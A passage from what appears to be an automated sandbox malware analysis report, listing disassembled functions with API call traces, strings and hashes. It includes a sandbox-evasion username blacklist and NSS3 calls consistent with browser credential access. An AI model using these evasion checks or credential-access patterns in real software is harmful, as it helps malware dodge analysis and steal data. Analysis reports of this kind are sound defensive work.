                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Pointer$AddressEncodeProc$Decode$AllocCurrentFreeHandleModuleThreadValue__calloc_crt__init_pointers__initptd__mtterm
                                                                                                                                                                                          • String ID: FlsAlloc$FlsFree$FlsGetValue$FlsSetValue$KERNEL32.DLL
                                                                                                                                                                                          • API String ID: 3732613303-3819984048
                                                                                                                                                                                          • Opcode ID: 070270d598827d08530cbd364107937ed8c543390d9010b5007e8477ab67a178
                                                                                                                                                                                          • Instruction ID: 9f1433150c20f789538d83adadd6b4a72703bb212e5172acfba3635cacf3126c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 070270d598827d08530cbd364107937ed8c543390d9010b5007e8477ab67a178
                                                                                                                                                                                          • Instruction Fuzzy Hash: 8F317CB0C047529AFB526F79BD4961A3BF4EF44762B14012BE519B32B0DFBC9480CB54
                                                                                                                                                                                          Function 6C594C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C584F51,00000000), ref: 6C594C50
                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C584F51,00000000), ref: 6C594C5B
                                                                                                                                                                                          • PR_smprintf.NSS3(6C66AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C584F51,00000000), ref: 6C594C76
                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C584F51,00000000), ref: 6C594CAE
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C594CC9
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C594CF4
                                                                                                                                                                                          • strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C594D0B
                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C584F51,00000000), ref: 6C594D5E
                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C584F51,00000000), ref: 6C594D68
                                                                                                                                                                                          • PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C594D85
                                                                                                                                                                                          • PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C594DA2
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C594DB9
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C594DCF
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$R_smprintf$strlen$Alloc_Util
                                                                                                                                                                                          • String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
                                                                                                                                                                                          • API String ID: 3756394533-2552752316
                                                                                                                                                                                          • Opcode ID: aa0eda1eb298f535d67b21b1086ffcff7717d0a068e14a70ed35234ee7531c2e
                                                                                                                                                                                          • Instruction ID: a96a2775ab6ee30fec4044bf346b90a154eed49ef83df8f392fe0b32ee28a8c7
                                                                                                                                                                                          • Opcode Fuzzy Hash: aa0eda1eb298f535d67b21b1086ffcff7717d0a068e14a70ed35234ee7531c2e
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1E417DB5900281ABDB119F259C846BB7A75AF9330CF094164EC2647B11E735ED14C7E7
                                                                                                                                                                                          Function 6C576CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 6C576910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C576943
                                                                                                                                                                                            • Part of subcall function 6C576910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C576957
                                                                                                                                                                                            • Part of subcall function 6C576910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C576972
                                                                                                                                                                                            • Part of subcall function 6C576910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C576983
                                                                                                                                                                                            • Part of subcall function 6C576910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C5769AA
                                                                                                                                                                                            • Part of subcall function 6C576910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C5769BE
                                                                                                                                                                                            • Part of subcall function 6C576910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C5769D2
                                                                                                                                                                                            • Part of subcall function 6C576910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C5769DF
                                                                                                                                                                                            • Part of subcall function 6C576910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C576A5B
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C576D8C
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C576DC5
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576DD6
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576DE7
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C576E1F
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C576E4B
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C576E72
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576EA7
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576EC4
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576ED5
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C576EE3
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576EF4
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576F08
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C576F35
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576F44
                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C576F5B
                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C576F65
                                                                                                                                                                                            • Part of subcall function 6C576C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C57781D,00000000,6C56BE2C,?,6C576B1D,?,?,?,?,00000000,00000000,6C57781D), ref: 6C576C40
                                                                                                                                                                                            • Part of subcall function 6C576C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C57781D,?,6C56BE2C,?), ref: 6C576C58
                                                                                                                                                                                            • Part of subcall function 6C576C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C57781D), ref: 6C576C6F
                                                                                                                                                                                            • Part of subcall function 6C576C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C576C84
                                                                                                                                                                                            • Part of subcall function 6C576C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C576C96
                                                                                                                                                                                            • Part of subcall function 6C576C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C576CAA
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C576F90
                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C576FC5
                                                                                                                                                                                          • PK11_GetInternalKeySlot.NSS3 ref: 6C576FF4
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: free$strcmp$strncmp$FlagL_strncasecmp$Strip$InternalK11_ParameterSecureSkipSlot
                                                                                                                                                                                          • String ID: +`Xl
                                                                                                                                                                                          • API String ID: 1304971872-684115500
                                                                                                                                                                                          • Opcode ID: 04a007a03bfcb383e8d03efb82583b1b62b324a8e0561f05b80b3c3474de6d8b
                                                                                                                                                                                          • Instruction ID: b0c38ab9960a0e048103e4f9b097d2195e6ce3001b916416e3703ed402c37d29
                                                                                                                                                                                          • Opcode Fuzzy Hash: 04a007a03bfcb383e8d03efb82583b1b62b324a8e0561f05b80b3c3474de6d8b
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0FB15DB0E01319AFDF20DBA5DC84B9EBBB4AF05358F140124E815E7600EB35E998CBB1
                                                                                                                                                                                          Function 00021927 Relevance: 36.8, APIs: 2, Strings: 19, Instructions: 56stringCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetUserNameA.ADVAPI32(?,?), ref: 00021A13
                                                                                                                                                                                          • lstrcmpiA.KERNEL32(0005ABCC,?), ref: 00021A2E
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: NameUserlstrcmpi
                                                                                                                                                                                          • String ID: CurrentUser$Emily$HAPUBWS$Hong Lee$IT-ADMIN$John Doe$Johnson$Miller$Peter Wilson$Sand box$WDAGUtilityAccount$maltest$malware$milozs$sandbox$test user$timmy$user$virus
                                                                                                                                                                                          • API String ID: 542268695-1784693376
                                                                                                                                                                                          • Opcode ID: c8012752950895fe5342e627cfe3b3eff9e827838fd0fef59e8b1a41a2e3730f
                                                                                                                                                                                          • Instruction ID: dabdf733c771df9ac7a564e1657c4974ccf951340b51b1ec4f19b379470296c6
                                                                                                                                                                                          • Opcode Fuzzy Hash: c8012752950895fe5342e627cfe3b3eff9e827838fd0fef59e8b1a41a2e3730f
                                                                                                                                                                                          • Instruction Fuzzy Hash: EB21F1B0A0126C8BDF60CF15DD487DEBFF5AB46306F0042D999486A210C7B84ACDCF86
                                                                                                                                                                                          Function 0003260C Relevance: 33.5, APIs: 16, Strings: 3, Instructions: 204stringprocesssynchronizationCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 000304E7: lstrcpyA.KERNEL32(00000000,00000000,?,0003707B,000566CD,?,?,?,?,0003858F), ref: 0003050D
                                                                                                                                                                                          • _memset.LIBCMT ref: 000327B1
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?,?,?,?), ref: 000327C3
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,00056698), ref: 000327D5
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,744fd163d6d4e0ac37e4032bcbfbb6af), ref: 000327E7
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,0005669C), ref: 000327F9
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00032809
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000566A0), ref: 0003281B
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00032824
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,EMPTY), ref: 00032840
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000566AC), ref: 00032852
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,?), ref: 00032862
                                                                                                                                                                                          • lstrcatA.KERNEL32(?,000566B0), ref: 00032874
                                                                                                                                                                                          • lstrlenA.KERNEL32(?), ref: 00032881
                                                                                                                                                                                          • _memset.LIBCMT ref: 000328B7
                                                                                                                                                                                            • Part of subcall function 00030549: lstrlenA.KERNEL32(?,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 0003054F
                                                                                                                                                                                            • Part of subcall function 00030549: lstrcpyA.KERNEL32(00000000,00000000,?,00037174,000566CF,000566CE,?,?,?,?,0003858F), ref: 00030581
                                                                                                                                                                                            • Part of subcall function 00031C4A: GetSystemTime.KERNEL32(?,00056701,?), ref: 00031C79
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcpyA.KERNEL32(00000000,?,0000000C,000375E9,000566DA), ref: 000305F5
                                                                                                                                                                                            • Part of subcall function 000305C7: lstrcatA.KERNEL32(?,?), ref: 000305FF
                                                                                                                                                                                            • Part of subcall function 00030609: lstrlenA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 0003061D
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030645
                                                                                                                                                                                            • Part of subcall function 00030609: lstrcatA.KERNEL32(?,00000000,?,?,?,?,0003709C,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 00030650
                                                                                                                                                                                            • Part of subcall function 0003058D: lstrcpyA.KERNEL32(00000000,?,00000000,000370BA,00056C18,00000000,000566CD,?,?,?,?,0003858F), ref: 000305BD
                                                                                                                                                                                            • Part of subcall function 00030519: lstrcpyA.KERNEL32(00000000,?,?,00021D07,?,00037621), ref: 00030538
                                                                                                                                                                                            • Part of subcall function 00032446: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,00034A8D), ref: 00032460
                                                                                                                                                                                          • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,00000020,00000000,00000000,?,?,000566B4,?), ref: 00032924
                                                                                                                                                                                          • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00032932
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2676109470.0000000000021000.00000080.00000001.01000000.00000003.sdmp, Offset: 00020000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2676092931.0000000000020000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676150175.000000000005D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000007D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000083000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000087000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000008B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000017D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.0000000000183000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001A2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.00000000001C1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676172575.000000000025A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2676422716.0000000000290000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_20000_out.jbxd
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: lstrcat$lstrcpy$lstrlen$Create_memset$FileObjectProcessSingleSystemTimeWait
                                                                                                                                                                                          • String ID: .exe$744fd163d6d4e0ac37e4032bcbfbb6af$EMPTY
                                                                                                                                                                                          • API String ID: 141474312-738958351
                                                                                                                                                                                          • Opcode ID: ce0323a3c1a1138b0bbb74825bd1aafc60491615fa2e4f7d0afd2cc927605f66
                                                                                                                                                                                          • Instruction ID: 1331281a8b599293ad9135f4bfdfa235a611d1ab6b211891732526f9a6b610a5
                                                                                                                                                                                          • Opcode Fuzzy Hash: ce0323a3c1a1138b0bbb74825bd1aafc60491615fa2e4f7d0afd2cc927605f66
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6381EFB2D4012DABCF11EFA4EC46ADE777CAB08305F4144E5BB09B7152D630AE898F65
                                                                                                                                                                                          Function 6C572D80 Relevance: 33.4, APIs: 22, Instructions: 381COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,00000000,?), ref: 6C572DEC
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,00000000,?), ref: 6C572E00
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C572E2B
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C572E43
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,6C544F1C,?,-00000001,00000000,?), ref: 6C572E74
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,00000000,?,?,?,6C544F1C,?,-00000001,00000000), ref: 6C572E88
                                                                                                                                                                                          • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C572EC6
                                                                                                                                                                                          • TlsGetValue.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C572EE4
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 6C572EF8
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C572F62
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C572F86
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C572F9E
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C572FCA
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C57301A
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C57302E
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C573066
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C573085
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C5730EC
                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C57310C
                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(0000001C), ref: 6C573124
                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C57314C
                                                                                                                                                                                            • Part of subcall function 6C559180: PK11_NeedUserInit.NSS3(?,?,?,00000000,00000001,6C58379E,?,6C559568,00000000,?,6C58379E,?,00000001,?), ref: 6C55918D
                                                                                                                                                                                            • Part of subcall function 6C559180: PR_SetError.NSS3(FFFFE000,00000000,?,?,?,00000000,00000001,6C58379E,?,6C559568,00000000,?,6C58379E,?,00000001,?), ref: 6C5591A0
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207AD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207CD
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C4B204A), ref: 6C5207D6
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C4B204A), ref: 6C5207E4
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,6C4B204A), ref: 6C520864
                                                                                                                                                                                            • Part of subcall function 6C5207A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C520880
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsSetValue.KERNEL32(00000000,?,?,6C4B204A), ref: 6C5208CB
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208D7
                                                                                                                                                                                            • Part of subcall function 6C5207A0: TlsGetValue.KERNEL32(?,?,6C4B204A), ref: 6C5208FB
                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C57316D
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Value$Unlock$CriticalEnterSection$Error$calloc$InitK11_NeedUser
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3383223490-0
                                                                                                                                                                                          • Opcode ID: 8ce7547eecfa34492f95ebc40075bd9ca0c90e568db811f294f90c1ffa679601
                                                                                                                                                                                          • Instruction ID: ea1b24c1ae7fd4145849006d0dc2721a1f745ae30ac5c6beefb95694ec796a86
                                                                                                                                                                                          • Opcode Fuzzy Hash: 8ce7547eecfa34492f95ebc40075bd9ca0c90e568db811f294f90c1ffa679601
                                                                                                                                                                                          • Instruction Fuzzy Hash: 4CF18CB1D00209EFDF10DF69DC88AA9BBB4BF09318F144169EC15A7711EB31E995CBA1
                                                                                                                                                                                          Function 6C566D60 Relevance: 31.6, APIs: 9, Strings: 9, Instructions: 119COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • PR_LogPrint.NSS3(C_Digest), ref: 6C566D86
                                                                                                                                                                                          • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C566DB4
                                                                                                                                                                                          • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C566DC3
                                                                                                                                                                                            • Part of subcall function 6C64D930: PL_strncpyz.NSS3(?,?,?), ref: 6C64D963
                                                                                                                                                                                          • PR_LogPrint.NSS3(?,00000000), ref: 6C566DD9
                                                                                                                                                                                          • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6C566DFA
                                                                                                                                                                                          • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6C566E13
                                                                                                                                                                                          • PR_LogPrint.NSS3( pDigest = 0x%p,?), ref: 6C566E2C
                                                                                                                                                                                          • PR_LogPrint.NSS3( pulDigestLen = 0x%p,?), ref: 6C566E47
                                                                                                                                                                                          • PR_LogPrint.NSS3( *pulDigestLen = 0x%x,?), ref: 6C566EB9
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.2704671032.000000006C4B1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6C4B0000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.2704319815.000000006C4B0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2704915889.000000006C68E000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705735301.000000006C68F000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705771799.000000006C690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.2705969519.000000006C695000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_6c4b0000_out.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Print$L_strncpyz$L_strcatn
